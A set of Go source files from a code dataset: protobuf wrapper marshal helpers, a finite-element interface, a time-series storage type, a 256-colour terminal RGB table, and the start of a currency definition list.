func SizeOfStdString(v string) int {
pv := &StringValue{Value: v}
return pv.Size()
}
func StdStringMarshal(v string) ([]byte, error) {
size := SizeOfStdString(v)
buf := make([]byte, size)
_, err := StdStringMarshalTo(v, buf)
return buf, err
}
func StdStringMarshalTo(v string, data []byte) (int, error) {
pv := &StringValue{Value: v}
return pv.MarshalTo(data)
}
func StdStringUnmarshal(v *string, data []byte) error {
pv := &StringValue{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdBytes(r randyWrappers, easy bool) *[]byte {
v := NewPopulatedBytesValue(r, easy)
return &v.Value
}
func SizeOfStdBytes(v []byte) int {
pv := &BytesValue{Value: v}
return pv.Size()
}
func StdBytesMarshal(v []byte) ([]byte, error) {
size := SizeOfStdBytes(v)
buf := make([]byte, size)
_, err := StdBytesMarshalTo(v, buf)
return buf, err
}
func StdBytesMarshalTo(v []byte, data []byte) (int, error) {
pv := &BytesValue{Value: v}
return pv.MarshalTo(data)
}
func StdBytesUnmarshal(v *[]byte, data []byte) error {
pv := &BytesValue{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
} | vendor/github.com/gogo/protobuf/types/wrappers_gogo.go | 0.713931 | 0.409339 | wrappers_gogo.go | starcoder |
package fem
import (
"github.com/cpmech/gofem/inp"
"github.com/cpmech/gosl/fun"
"github.com/cpmech/gosl/la"
)
// OutIpData is an auxiliary structure to transfer data from integration points (IP) to output routines.
type OutIpData struct {
Eid int // id of element that owns this ip
X []float64 // coordinates
V map[string]*float64 // maps label (e.g. "sx") to pointer to value
}
// Elem defines what elements must calculate
type Elem interface {
// information and initialisation
Id() int // returns the cell Id
SetEqs(eqs [][]int, mixedform_eqs []int) (ok bool) // set equations
// conditions (natural BCs and element's)
SetEleConds(key string, f fun.Func, extra string) (ok bool) // set element conditions
// called for each time step
InterpStarVars(sol *Solution) (ok bool) // interpolate star variables to integration points
// called for each iteration
AddToRhs(fb []float64, sol *Solution) (ok bool) // adds -R to global residual vector fb
AddToKb(Kb *la.Triplet, sol *Solution, firstIt bool) (ok bool) // adds element K to global Jacobian matrix Kb
Update(sol *Solution) (ok bool) // perform (tangent) update
// reading and writing of element data
Encode(enc Encoder) (ok bool) // encodes internal variables
Decode(dec Decoder) (ok bool) // decodes internal variables
// output
OutIpsData() (data []*OutIpData) // returns data from all integration points for output
}
// ElemConnector defines connector elements; elements that depend upon others
type ElemConnector interface {
Id() int // returns the cell Id
Connect(cid2elem []Elem, c *inp.Cell) (nnzK int, ok bool) // connect multiple elements; e.g.: connect rod/solid elements in Rjoints
}
// ElemIntvars defines elements with {z,q} internal variables
type ElemIntvars interface {
Ipoints() (coords [][]float64) // returns the real coordinates of integration points [nip][ndim]
SetIniIvs(sol *Solution, ivs map[string][]float64) (ok bool) // sets initial ivs for given values in sol and ivs map
BackupIvs() (ok bool) // create copy of internal variables
RestoreIvs() (ok bool) // restore internal variables from copies
Ureset(sol *Solution) (ok bool) // fixes internal variables after u (displacements) have been zeroed
}
// Info holds all information required to set a simulation stage
type Info struct {
// essential
Dofs [][]string // solution variables PER NODE. ex for 2 nodes: [["ux", "uy", "rz"], ["ux", "uy", "rz"]]
Y2F map[string]string // maps "y" keys to "f" keys. ex: "ux" => "fx", "pl" => "ql"
// internal Dofs; e.g. for mixed formulations
NintDofs int // number of internal dofs
// t1 and t2 variables (time-derivatives of first and second order)
T1vars []string // "pl"
T2vars []string // "ux", "uy"
}
// GetElemInfo returns information about elements/formulations
// cellType -- e.g. "qua8"
// elemType -- e.g. "u"
func GetElemInfo(cellType, elemType string, faceConds []*FaceCond) *Info {
infogetter, ok := infogetters[elemType]
if LogErrCond(!ok, "cannot find element type = %s", elemType) {
return nil
}
info := infogetter(cellType, faceConds)
if LogErrCond(info == nil, "cannot find info from %q element", elemType) {
return nil
}
return info
}
// NewElem returns a new element from its type; e.g. "p", "u" or "up"
func NewElem(edat *inp.ElemData, cid int, msh *inp.Mesh, faceConds []*FaceCond) Elem {
elemType := edat.Type
allocator, ok := eallocators[elemType]
if LogErrCond(!ok, "cannot find element type = %s", elemType) {
return nil
}
c := msh.Cells[cid]
x := BuildCoordsMatrix(c, msh)
ele := allocator(c.Type, faceConds, cid, edat, x)
if LogErrCond(ele == nil, "cannot allocate %q element", elemType) {
return nil
}
return ele
}
// BuildCoordsMatrix returns the coordinate matrix of a particular Cell
func BuildCoordsMatrix(c *inp.Cell, msh *inp.Mesh) (x [][]float64) {
x = la.MatAlloc(msh.Ndim, len(c.Verts))
for i := 0; i < msh.Ndim; i++ {
for j, v := range c.Verts {
x[i][j] = msh.Verts[v].C[i]
}
}
return
}
// infogetters holds all available formulations/info; elemType => infogetter
var infogetters = make(map[string]func(cellType string, faceConds []*FaceCond) *Info)
// eallocators holds all available elements; elemType => eallocator
var eallocators = make(map[string]func(cellType string, faceConds []*FaceCond, cid int, edat *inp.ElemData, x [][]float64) Elem) | fem/element.go | 0.579519 | 0.404684 | element.go | starcoder |
package storage
import (
"math"
"time"
"github.com/m3db/m3x/close"
)
// A Series is a series of datapoints, bucketed into fixed time intervals
type Series interface {
xclose.Closer
Len() int // Len returns the number of datapoints in the series
StepSize() time.Duration // StepSize is the size of each "step" in the series
StartTime() time.Time // StartTime is the start time for the series
EndTime() time.Time // EndTime is the end time for the series
ValueAt(n int) float64 // ValueAt returns the value at the given step
StartTimeAt(n int) time.Time // StartTimeAt returns the start time for the given step
}
type series struct {
values SeriesValues
stepSize time.Duration
startTime time.Time
vp SeriesValuesPool
}
func (s series) Len() int { return s.values.Len() }
func (s series) StepSize() time.Duration { return s.stepSize }
func (s series) StartTime() time.Time { return s.startTime }
func (s series) EndTime() time.Time { return s.startTime.Add(time.Duration(s.Len()) * s.stepSize) }
func (s series) ValueAt(n int) float64 { return s.values.ValueAt(n) }
func (s series) StartTimeAt(n int) time.Time { return s.startTime.Add(time.Duration(n) * s.stepSize) }
func (s series) Close() error {
if s.vp != nil {
s.vp.Release(s.values)
}
return nil
}
// NewSeries returns a new series wrapped around a set of values
func NewSeries(start time.Time, step time.Duration, vals SeriesValues, pool SeriesValuesPool) Series {
return series{
startTime: start,
stepSize: step,
values: vals,
vp: pool,
}
}
// SeriesValues hold the underlying values in a series. Values can often be large, and
// benefit from direct pooling.
type SeriesValues interface {
Len() int // the number of values in the series
SetValueAt(n int, v float64) // sets the value at the given location
ValueAt(n int) float64 // returns the value at the given location
}
// Float64SeriesValues is a SeriesValues implementation based on a float64 slice
type Float64SeriesValues []float64
// Len returns the number of values in the series
func (s Float64SeriesValues) Len() int { return len(s) }
// SetValueAt sets the value at the given position
func (s Float64SeriesValues) SetValueAt(n int, v float64) { s[n] = v }
// ValueAt returns the value at the given position
func (s Float64SeriesValues) ValueAt(n int) float64 { return s[n] }
// Reset fills the series with NaNs
func (s Float64SeriesValues) Reset() {
for n := range s {
s[n] = math.NaN()
}
}
// A SeriesValuesPool allows for pooling of the underlying SeriesValues, which
// are typically large and benefit from being held in some form of pool
type SeriesValuesPool interface {
// New creates or reserves series values of the specified length
New(len int) SeriesValues
// Release releases previously allocated values
Release(v SeriesValues)
} | series.go | 0.850562 | 0.572125 | series.go | starcoder |
package termios
var coldef256 = make(coldef)
func init() {
coldef256[&Color256Black] = RGB{0, 0, 0}
coldef256[&Color256Maroon] = RGB{128, 0, 0}
coldef256[&Color256Green] = RGB{0, 128, 0}
coldef256[&Color256Olive] = RGB{128, 128, 0}
coldef256[&Color256Navy] = RGB{0, 0, 128}
coldef256[&Color256Purple] = RGB{128, 0, 128}
coldef256[&Color256Teal] = RGB{0, 128, 128}
coldef256[&Color256Silver] = RGB{192, 192, 192}
coldef256[&Color256Grey] = RGB{128, 128, 128}
coldef256[&Color256Red] = RGB{255, 0, 0}
coldef256[&Color256Lime] = RGB{0, 255, 0}
coldef256[&Color256Yellow] = RGB{255, 255, 0}
coldef256[&Color256Blue] = RGB{0, 0, 255}
coldef256[&Color256Fuchsia] = RGB{255, 0, 255}
coldef256[&Color256Aqua] = RGB{0, 255, 255}
coldef256[&Color256White] = RGB{255, 255, 255}
coldef256[&Color256Grey0] = RGB{0, 0, 0}
coldef256[&Color256NavyBlue] = RGB{0, 0, 95}
coldef256[&Color256DarkBlue] = RGB{0, 0, 135}
coldef256[&Color256Blue3Dark] = RGB{0, 0, 175}
coldef256[&Color256Blue3Light] = RGB{0, 0, 215}
coldef256[&Color256Blue1] = RGB{0, 0, 255}
coldef256[&Color256DarkGreen] = RGB{0, 95, 0}
coldef256[&Color256DeepSkyBlue4Dark] = RGB{0, 95, 95}
coldef256[&Color256DeepSkyBlue4Medium] = RGB{0, 95, 135}
coldef256[&Color256DeepSkyBlue4Light] = RGB{0, 95, 175}
coldef256[&Color256DodgerBlue3] = RGB{0, 95, 215}
coldef256[&Color256DodgerBlue2] = RGB{0, 95, 255}
coldef256[&Color256Green4] = RGB{0, 135, 0}
coldef256[&Color256SpringGreen4] = RGB{0, 135, 95}
coldef256[&Color256Turquoise4] = RGB{0, 135, 135}
coldef256[&Color256DeepSkyBlue3Dark] = RGB{0, 135, 175}
coldef256[&Color256DeepSkyBlue3Light] = RGB{0, 135, 215}
coldef256[&Color256DodgerBlue1] = RGB{0, 135, 255}
coldef256[&Color256Green3Dark] = RGB{0, 175, 0}
coldef256[&Color256SpringGreen3Dark] = RGB{0, 175, 95}
coldef256[&Color256DarkCyan] = RGB{0, 175, 135}
coldef256[&Color256LightSeaGreen] = RGB{0, 175, 175}
coldef256[&Color256DeepSkyBlue2] = RGB{0, 175, 215}
coldef256[&Color256DeepSkyBlue1] = RGB{0, 175, 255}
coldef256[&Color256Green3Light] = RGB{0, 215, 0}
coldef256[&Color256SpringGreen3Light] = RGB{0, 215, 95}
coldef256[&Color256SpringGreen2Dark] = RGB{0, 215, 135}
coldef256[&Color256Cyan3] = RGB{0, 215, 175}
coldef256[&Color256DarkTurquoise] = RGB{0, 215, 215}
coldef256[&Color256Turquoise2] = RGB{0, 215, 255}
coldef256[&Color256Green1] = RGB{0, 255, 0}
coldef256[&Color256SpringGreen2Light] = RGB{0, 255, 95}
coldef256[&Color256SpringGreen1] = RGB{0, 255, 135}
coldef256[&Color256MediumSpringGreen] = RGB{0, 255, 175}
coldef256[&Color256Cyan2] = RGB{0, 255, 215}
coldef256[&Color256Cyan1] = RGB{0, 255, 255}
coldef256[&Color256DarkRedDark] = RGB{95, 0, 0}
coldef256[&Color256DeepPink4Dark] = RGB{95, 0, 95}
coldef256[&Color256Purple4Dark] = RGB{95, 0, 135}
coldef256[&Color256Purple4Light] = RGB{95, 0, 175}
coldef256[&Color256Purple3] = RGB{95, 0, 215}
coldef256[&Color256BlueViolet] = RGB{95, 0, 255}
coldef256[&Color256Orange4Dark] = RGB{95, 95, 0}
coldef256[&Color256Grey37] = RGB{95, 95, 95}
coldef256[&Color256MediumPurple4] = RGB{95, 95, 135}
coldef256[&Color256SlateBlue3Dark] = RGB{95, 95, 175}
coldef256[&Color256SlateBlue3Light] = RGB{95, 95, 215}
coldef256[&Color256RoyalBlue1] = RGB{95, 95, 255}
coldef256[&Color256Chartreuse4] = RGB{95, 135, 0}
coldef256[&Color256DarkSeaGreen4Light] = RGB{95, 135, 95}
coldef256[&Color256PaleTurquoise4] = RGB{95, 135, 135}
coldef256[&Color256SteelBlue] = RGB{95, 135, 175}
coldef256[&Color256SteelBlue3] = RGB{95, 135, 215}
coldef256[&Color256CornflowerBlue] = RGB{95, 135, 255}
coldef256[&Color256Chartreuse3Dark] = RGB{95, 175, 0}
coldef256[&Color256DarkSeaGreen4Light] = RGB{95, 175, 95}
coldef256[&Color256CadetBlueDark] = RGB{95, 175, 135}
coldef256[&Color256CadetBlueLight] = RGB{95, 175, 175}
coldef256[&Color256SkyBlue3] = RGB{95, 175, 215}
coldef256[&Color256SteelBlue1Dark] = RGB{95, 175, 255}
coldef256[&Color256Chartreuse3Light] = RGB{95, 215, 0}
coldef256[&Color256PaleGreen3Dark] = RGB{95, 215, 95}
coldef256[&Color256SeaGreen3] = RGB{95, 215, 135}
coldef256[&Color256Aquamarine3] = RGB{95, 215, 175}
coldef256[&Color256MediumTurquoise] = RGB{95, 215, 215}
coldef256[&Color256SteelBlue1Light] = RGB{95, 215, 255}
coldef256[&Color256Chartreuse2Dark] = RGB{95, 255, 0}
coldef256[&Color256SeaGreen2] = RGB{95, 255, 95}
coldef256[&Color256SeaGreen1Dark] = RGB{95, 255, 135}
coldef256[&Color256SeaGreen1Light] = RGB{95, 255, 175}
coldef256[&Color256Aquamarine1Dark] = RGB{95, 255, 215}
coldef256[&Color256DarkSlateGray2] = RGB{95, 255, 255}
coldef256[&Color256DarkRedLight] = RGB{135, 0, 0}
coldef256[&Color256DeepPink4Medium] = RGB{135, 0, 95}
coldef256[&Color256DarkMagentaDark] = RGB{135, 0, 135}
coldef256[&Color256DarkMagentaLight] = RGB{135, 0, 175}
coldef256[&Color256DarkVioletDark] = RGB{135, 0, 215}
coldef256[&Color256Purple] = RGB{135, 0, 255}
coldef256[&Color256Orange4Light] = RGB{135, 95, 0}
coldef256[&Color256LightPink4] = RGB{135, 95, 95}
coldef256[&Color256Plum4] = RGB{135, 95, 135}
coldef256[&Color256MediumPurple3Dark] = RGB{135, 95, 175}
coldef256[&Color256MediumPurple3Light] = RGB{135, 95, 215}
coldef256[&Color256SlateBlue1] = RGB{135, 95, 255}
coldef256[&Color256Yellow4Dark] = RGB{135, 135, 0}
coldef256[&Color256Wheat4] = RGB{135, 135, 95}
coldef256[&Color256Grey53] = RGB{135, 135, 135}
coldef256[&Color256LightSlateGrey] = RGB{135, 135, 175}
coldef256[&Color256MediumPurpleDark] = RGB{135, 135, 215}
coldef256[&Color256LightSlateBlue] = RGB{135, 135, 255}
coldef256[&Color256Yellow4Light] = RGB{135, 175, 0}
coldef256[&Color256DarkOliveGreen3] = RGB{135, 175, 95}
coldef256[&Color256DarkSeaGreen] = RGB{135, 175, 135}
coldef256[&Color256LightSkyBlue3Dark] = RGB{135, 175, 175}
coldef256[&Color256LightSkyBlue3Light] = RGB{135, 175, 215}
coldef256[&Color256SkyBlue2] = RGB{135, 175, 255}
coldef256[&Color256Chartreuse2Light] = RGB{135, 215, 0}
coldef256[&Color256DarkOliveGreen3] = RGB{135, 215, 95}
coldef256[&Color256PaleGreen3Light] = RGB{135, 215, 135}
coldef256[&Color256DarkSeaGreen3Dark] = RGB{135, 215, 175}
coldef256[&Color256DarkSlateGray3] = RGB{135, 215, 215}
coldef256[&Color256SkyBlue1] = RGB{135, 215, 255}
coldef256[&Color256Chartreuse1] = RGB{135, 255, 0}
coldef256[&Color256LightGreenDark] = RGB{135, 255, 95}
coldef256[&Color256LightGreenLight] = RGB{135, 255, 135}
coldef256[&Color256PaleGreen1Dark] = RGB{135, 255, 175}
coldef256[&Color256Aquamarine1Light] = RGB{135, 255, 215}
coldef256[&Color256DarkSlateGray1] = RGB{135, 255, 255}
coldef256[&Color256Red3Dark] = RGB{175, 0, 0}
coldef256[&Color256DeepPink4Light] = RGB{175, 0, 95}
coldef256[&Color256MediumVioletRed] = RGB{175, 0, 135}
coldef256[&Color256Magenta3] = RGB{175, 0, 175}
coldef256[&Color256DarkVioletLight] = RGB{175, 0, 215}
coldef256[&Color256Purple] = RGB{175, 0, 255}
coldef256[&Color256DarkOrange3Dark] = RGB{175, 95, 0}
coldef256[&Color256IndianRedDark] = RGB{175, 95, 95}
coldef256[&Color256HotPink3Dark] = RGB{175, 95, 135}
coldef256[&Color256MediumOrchid3] = RGB{175, 95, 175}
coldef256[&Color256MediumOrchid] = RGB{175, 95, 215}
coldef256[&Color256MediumPurple2Dark] = RGB{175, 95, 255}
coldef256[&Color256DarkGoldenrod] = RGB{175, 135, 0}
coldef256[&Color256LightSalmon3Dark] = RGB{175, 135, 95}
coldef256[&Color256RosyBrown] = RGB{175, 135, 135}
coldef256[&Color256Grey63] = RGB{175, 135, 175}
coldef256[&Color256MediumPurple2Light] = RGB{175, 135, 215}
coldef256[&Color256MediumPurple1] = RGB{175, 135, 255}
coldef256[&Color256Gold3Dark] = RGB{175, 175, 0}
coldef256[&Color256DarkKhaki] = RGB{175, 175, 95}
coldef256[&Color256NavajoWhite3] = RGB{175, 175, 135}
coldef256[&Color256Grey69] = RGB{175, 175, 175}
coldef256[&Color256LightSteelBlue3] = RGB{175, 175, 215}
coldef256[&Color256LightSteelBlue] = RGB{175, 175, 255}
coldef256[&Color256Yellow3Dark] = RGB{175, 215, 0}
coldef256[&Color256DarkOliveGreen3] = RGB{175, 215, 95}
coldef256[&Color256DarkSeaGreen3Light] = RGB{175, 215, 135}
coldef256[&Color256DarkSeaGreen2Dark] = RGB{175, 215, 175}
coldef256[&Color256LightCyan3] = RGB{175, 215, 215}
coldef256[&Color256LightSkyBlue1] = RGB{175, 215, 255}
coldef256[&Color256GreenYellow] = RGB{175, 255, 0}
coldef256[&Color256DarkOliveGreen2] = RGB{175, 255, 95}
coldef256[&Color256PaleGreen1Light] = RGB{175, 255, 135}
coldef256[&Color256DarkSeaGreen2Light] = RGB{175, 255, 175}
coldef256[&Color256DarkSeaGreen1Dark] = RGB{175, 255, 215}
coldef256[&Color256PaleTurquoise1] = RGB{175, 255, 255}
coldef256[&Color256Red3Light] = RGB{215, 0, 0}
coldef256[&Color256DeepPink3Dark] = RGB{215, 0, 95}
coldef256[&Color256DeepPink3Light] = RGB{215, 0, 135}
coldef256[&Color256Magenta3Dark] = RGB{215, 0, 175}
coldef256[&Color256Magenta3Light] = RGB{215, 0, 215}
coldef256[&Color256Magenta2Dark] = RGB{215, 0, 255}
coldef256[&Color256DarkOrange3Light] = RGB{215, 95, 0}
coldef256[&Color256IndianRedLight] = RGB{215, 95, 95}
coldef256[&Color256HotPink3Light] = RGB{215, 95, 135}
coldef256[&Color256HotPink2] = RGB{215, 95, 175}
coldef256[&Color256Orchid] = RGB{215, 95, 215}
coldef256[&Color256MediumOrchid1Dark] = RGB{215, 95, 255}
coldef256[&Color256Orange3] = RGB{215, 135, 0}
coldef256[&Color256LightSalmon3Light] = RGB{215, 135, 95}
coldef256[&Color256LightPink3] = RGB{215, 135, 135}
coldef256[&Color256Pink3] = RGB{215, 135, 175}
coldef256[&Color256Plum3] = RGB{215, 135, 215}
coldef256[&Color256Violet] = RGB{215, 135, 255}
coldef256[&Color256Gold3Light] = RGB{215, 175, 0}
coldef256[&Color256LightGoldenrod3] = RGB{215, 175, 95}
coldef256[&Color256Tan] = RGB{215, 175, 135}
coldef256[&Color256MistyRose3] = RGB{215, 175, 175}
coldef256[&Color256Thistle3] = RGB{215, 175, 215}
coldef256[&Color256Plum2] = RGB{215, 175, 255}
coldef256[&Color256Yellow3Light] = RGB{215, 215, 0}
coldef256[&Color256Khaki3] = RGB{215, 215, 95}
coldef256[&Color256LightGoldenrod2] = RGB{215, 215, 135}
coldef256[&Color256LightYellow3] = RGB{215, 215, 175}
coldef256[&Color256Grey84] = RGB{215, 215, 215}
coldef256[&Color256LightSteelBlue1] = RGB{215, 215, 255}
coldef256[&Color256Yellow2] = RGB{215, 255, 0}
coldef256[&Color256DarkOliveGreen1Dark] = RGB{215, 255, 95}
coldef256[&Color256DarkOliveGreen1Light] = RGB{215, 255, 135}
coldef256[&Color256DarkSeaGreen1Light] = RGB{215, 255, 175}
coldef256[&Color256Honeydew2] = RGB{215, 255, 215}
coldef256[&Color256LightCyan1] = RGB{215, 255, 255}
coldef256[&Color256Red1] = RGB{255, 0, 0}
coldef256[&Color256DeepPink2] = RGB{255, 0, 95}
coldef256[&Color256DeepPink1Dark] = RGB{255, 0, 135}
coldef256[&Color256DeepPink1Light] = RGB{255, 0, 175}
coldef256[&Color256Magenta2Light] = RGB{255, 0, 215}
coldef256[&Color256Magenta1] = RGB{255, 0, 255}
coldef256[&Color256OrangeRed1] = RGB{255, 95, 0}
coldef256[&Color256IndianRed1Dark] = RGB{255, 95, 95}
coldef256[&Color256IndianRed1Light] = RGB{255, 95, 135}
coldef256[&Color256HotPinkDark] = RGB{255, 95, 175}
coldef256[&Color256HotPinkLight] = RGB{255, 95, 215}
coldef256[&Color256MediumOrchid1Light] = RGB{255, 95, 255}
coldef256[&Color256DarkOrange] = RGB{255, 135, 0}
coldef256[&Color256Salmon1] = RGB{255, 135, 95}
coldef256[&Color256LightCoral] = RGB{255, 135, 135}
coldef256[&Color256PaleVioletRed1] = RGB{255, 135, 175}
coldef256[&Color256Orchid2] = RGB{255, 135, 215}
coldef256[&Color256Orchid1] = RGB{255, 135, 255}
coldef256[&Color256Orange1] = RGB{255, 175, 0}
coldef256[&Color256SandyBrown] = RGB{255, 175, 95}
coldef256[&Color256LightSalmon1] = RGB{255, 175, 135}
coldef256[&Color256LightPink1] = RGB{255, 175, 175}
coldef256[&Color256Pink1] = RGB{255, 175, 215}
coldef256[&Color256Plum1] = RGB{255, 175, 255}
coldef256[&Color256Gold1] = RGB{255, 215, 0}
coldef256[&Color256LightGoldenrod2] = RGB{255, 215, 95}
coldef256[&Color256LightGoldenrod2] = RGB{255, 215, 135}
coldef256[&Color256NavajoWhite1] = RGB{255, 215, 175}
coldef256[&Color256MistyRose1] = RGB{255, 215, 215}
coldef256[&Color256Thistle1] = RGB{255, 215, 255}
coldef256[&Color256Yellow1] = RGB{255, 255, 0}
coldef256[&Color256LightGoldenrod1] = RGB{255, 255, 95}
coldef256[&Color256Khaki1] = RGB{255, 255, 135}
coldef256[&Color256Wheat1] = RGB{255, 255, 175}
coldef256[&Color256Cornsilk1] = RGB{255, 255, 215}
coldef256[&Color256Grey100] = RGB{255, 255, 255}
coldef256[&Color256Grey3] = RGB{8, 8, 8}
coldef256[&Color256Grey7] = RGB{18, 18, 18}
coldef256[&Color256Grey11] = RGB{28, 28, 28}
coldef256[&Color256Grey15] = RGB{38, 38, 38}
coldef256[&Color256Grey19] = RGB{48, 48, 48}
coldef256[&Color256Grey23] = RGB{58, 58, 58}
coldef256[&Color256Grey27] = RGB{68, 68, 68}
coldef256[&Color256Grey30] = RGB{78, 78, 78}
coldef256[&Color256Grey35] = RGB{88, 88, 88}
coldef256[&Color256Grey39] = RGB{98, 98, 98}
coldef256[&Color256Grey42] = RGB{108, 108, 108}
coldef256[&Color256Grey46] = RGB{118, 118, 118}
coldef256[&Color256Grey50] = RGB{128, 128, 128}
coldef256[&Color256Grey54] = RGB{138, 138, 138}
coldef256[&Color256Grey58] = RGB{148, 148, 148}
coldef256[&Color256Grey62] = RGB{158, 158, 158}
coldef256[&Color256Grey66] = RGB{168, 168, 168}
coldef256[&Color256Grey70] = RGB{178, 178, 178}
coldef256[&Color256Grey74] = RGB{188, 188, 188}
coldef256[&Color256Grey78] = RGB{198, 198, 198}
coldef256[&Color256Grey82] = RGB{208, 208, 208}
coldef256[&Color256Grey85] = RGB{218, 218, 218}
coldef256[&Color256Grey89] = RGB{228, 228, 228}
coldef256[&Color256Grey93] = RGB{238, 238, 238}
} | spectrum256.go | 0.656438 | 0.460168 | spectrum256.go | starcoder |
package money
// Currency represents a currency.
type Currency struct {
// The name of the currency.
Name string
// The 3 char identifier of the currency (ISO 4217).
IsoCode string
// The symbol of the currency.
Symbol string
// Is true if the symbol will be displayed before the amount.
SymbolFirst bool
// Number of subunits that compose the unit. For example USD is made of 100
// cents, so SubunitToUnit is 100.
SubunitToUnit int
// Thousands separator.
ThousandsSeparator rune
// Decimal mark.
DecimalMark rune
}
var (
// From Ruby Money:
// Money::Currency.each { |c| puts "#{c.iso_code} = Currency{Name: \"#{c.name}\", IsoCode: \"#{c.iso_code}\", Symbol: \"#{c.symbol}\", SymbolFirst: #{c.symbol_first}, SubunitToUnit: #{c.subunit_to_unit}, ThousandsSeparator: '#{c.thousands_separator}', DecimalMark: '#{c.decimal_mark}'}" }; nil
AED = Currency{Name: "United Arab Emirates Dirham", IsoCode: "AED", Symbol: "د.إ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AFN = Currency{Name: "Afghan Afghani", IsoCode: "AFN", Symbol: "؋", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ALL = Currency{Name: "Albanian Lek", IsoCode: "ALL", Symbol: "L", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AMD = Currency{Name: "Armenian Dram", IsoCode: "AMD", Symbol: "դր.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ANG = Currency{Name: "Netherlands Antillean Gulden", IsoCode: "ANG", Symbol: "ƒ", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
AOA = Currency{Name: "An<NAME>", IsoCode: "AOA", Symbol: "Kz", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ARS = Currency{Name: "Argentine Peso", IsoCode: "ARS", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
AUD = Currency{Name: "Australian Dollar", IsoCode: "AUD", Symbol: "A$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AWG = Currency{Name: "Aruban Florin", IsoCode: "AWG", Symbol: "ƒ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AZN = Currency{Name: "Azerbaijani Manat", IsoCode: "AZN", Symbol: "₼", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BAM = Currency{Name: "Bosnia and Herzegovina Convertible Mark", IsoCode: "BAM", Symbol: "КМ", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BBD = Currency{Name: "Barbadian Dollar", IsoCode: "BBD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BCH = Currency{Name: "Bitcoin Cash", IsoCode: "BCH", Symbol: "₿", SymbolFirst: false, SubunitToUnit: 100000000, ThousandsSeparator: ',', DecimalMark: '.'}
BDT = Currency{Name: "Bangladeshi Taka", IsoCode: "BDT", Symbol: "৳", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BGN = Currency{Name: "Bulgarian Lev", IsoCode: "BGN", Symbol: "лв.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BHD = Currency{Name: "Bahraini Dinar", IsoCode: "BHD", Symbol: "ب.د", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
BIF = Currency{Name: "Burundian Franc", IsoCode: "BIF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
BMD = Currency{Name: "Bermudian Dollar", IsoCode: "BMD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BND = Currency{Name: "Brunei Dollar", IsoCode: "BND", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BOB = Currency{Name: "Bolivian Boliviano", IsoCode: "BOB", Symbol: "Bs.", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BRL = Currency{Name: "Brazilian Real", IsoCode: "BRL", Symbol: "R$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
BSD = Currency{Name: "Bahamian Dollar", IsoCode: "BSD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BTC = Currency{Name: "Bitcoin", IsoCode: "BTC", Symbol: "₿", SymbolFirst: true, SubunitToUnit: 100000000, ThousandsSeparator: ',', DecimalMark: '.'}
BTN = Currency{Name: "Bhutanese Ngultrum", IsoCode: "BTN", Symbol: "Nu.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BWP = Currency{Name: "Botswana Pula", IsoCode: "BWP", Symbol: "P", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BYN = Currency{Name: "Belarusian Ruble", IsoCode: "BYN", Symbol: "Br", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
BZD = Currency{Name: "Belize Dollar", IsoCode: "BZD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CAD = Currency{Name: "Canadian Dollar", IsoCode: "CAD", Symbol: "C$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CDF = Currency{Name: "Congolese Franc", IsoCode: "CDF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CHF = Currency{Name: "Swiss Franc", IsoCode: "CHF", Symbol: "CHF", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CLF = Currency{Name: "Unidad de Fomento", IsoCode: "CLF", Symbol: "UF", SymbolFirst: true, SubunitToUnit: 10000, ThousandsSeparator: '.', DecimalMark: ','}
CLP = Currency{Name: "Chilean Peso", IsoCode: "CLP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: '.', DecimalMark: ','}
CNH = Currency{Name: "Chinese Renminbi Yuan Offshore", IsoCode: "CNH", Symbol: "¥", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
